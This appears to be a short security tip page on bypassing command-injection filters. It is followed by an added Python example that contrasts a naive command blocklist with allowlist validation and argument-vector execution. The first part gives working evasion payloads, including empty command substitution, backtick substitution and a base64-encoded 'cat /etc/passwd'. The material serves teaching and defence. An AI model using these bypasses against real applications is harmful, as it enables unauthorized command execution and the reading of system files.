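CMD Injection. How to bypass application protection mechanisms
If an application creates a command blocklist
We can use the $() construction: an empty command substitution expands to nothing, so the shell still sees the original command name. The commands below return the same result: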
wh$()oami
whoami
If the ;, | and & symbols are blocked
We can use backticks (``):
echo "Payload: `ls | wc -l`"
If separators or some commands are blocked
We can use the base64 or xxd tools. Create the payload on the attacker machine:
echo "cat /etc/passwd" | base64
Payload:
`echo "<result from command above>" | base64 -d`
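
Seen from the defending side, the forms above show why a blocklist cannot make a shell command line safe. The following is an added example, not code from the original page: a constructed command blocklist beside an allowlist check combined with argument-vector execution. The names blocklist_allows, allowlist_allows, run_lookup, the blocked-word list and the hostname-style argument are assumptions for illustration.

```python
import re
import subprocess
import sys

# Constructed command blocklist of the kind the page describes (assumption).
BLOCKED_COMMANDS = ("whoami", "cat", "ls")

def blocklist_allows(value: str) -> bool:
    """Naive filter: reject only when a blocked word appears literally."""
    return not any(word in value for word in BLOCKED_COMMANDS)

# Allowlist for a hostname-like argument: no shell metacharacter can match.
SAFE_ARG = re.compile(r"[A-Za-z0-9][A-Za-z0-9.-]{0,252}")

def allowlist_allows(value: str) -> bool:
    return SAFE_ARG.fullmatch(value) is not None

def run_lookup(host: str) -> str:
    """Validate, then pass an argument vector so no shell parses the input."""
    if not allowlist_allows(host):
        raise ValueError(f"rejected input: {host!r}")
    # A Python child that echoes argv[1] stands in for the real tool
    # (assumption) so the example runs offline. A list argv means shell=False.
    child = "import sys; print(sys.argv[1])"
    done = subprocess.run([sys.executable, "-c", child, host],
                          capture_output=True, text=True, check=True)
    return done.stdout.strip()

# Inputs in the forms shown on the page, plus one benign value (constructed).
# They are only matched as strings here; no shell ever interprets them.
SAMPLES = ["whoami", "wh$()oami",
           '`echo "<base64 text>" | base64 -d`', "example.com"]

def compare(samples):
    """Return (input, blocklist verdict, allowlist verdict) per sample."""
    return [(s, blocklist_allows(s), allowlist_allows(s)) for s in samples]

if __name__ == "__main__":
    for sample, by_block, by_allow in compare(SAMPLES):
        print(f"{sample!r:45} blocklist={by_block!s:5} allowlist={by_allow}")
    # "whoami" passes the allowlist, but as an argv element it is only data.
    print(run_lookup("whoami"))
```

The blocklist accepts both obfuscated forms because the blocked word never appears literally, while the allowlist rejects them on the first metacharacter.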